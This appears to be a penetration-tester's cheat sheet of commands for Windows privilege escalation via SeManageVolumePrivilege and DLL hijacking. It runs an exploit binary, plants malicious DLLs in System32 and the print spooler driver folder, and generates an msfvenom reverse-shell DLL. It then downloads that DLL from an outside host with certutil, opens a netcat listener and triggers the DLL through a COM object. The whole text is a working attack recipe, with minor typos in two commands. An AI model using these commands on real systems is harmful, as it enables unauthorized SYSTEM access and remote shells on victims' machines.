# Run SeManageVolumeExploit
CMD> SeManageVolumeExploit.exe
CMD> icalcs C:\Windows # Check you have a (F) under Windows directory
# Copy phoneinfo.dll to *C:\Windows\System32*
# Place Report.wer file and WerTrigger.exe in a same directory.
# Run WerTrigger.exe.
# Kali
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=xx LPORT=1234 -f dll -o Printconfig.dll
# Target
certutil -urlcache -split -f http://192.168.45.183/Printconfig.dll
copy Printconfig.dll C:\Windows\System32\spool\drivers\x64\3\Printconfig.dll
# Kali
nv -nlvp 1234
# Target
PS> $type = [Type]::GetTypeFromCLSID("{854A20FB-2D44-457D-992F-EF13785D2B51}")
PS> $object = [Activator]::CreateInstance($type)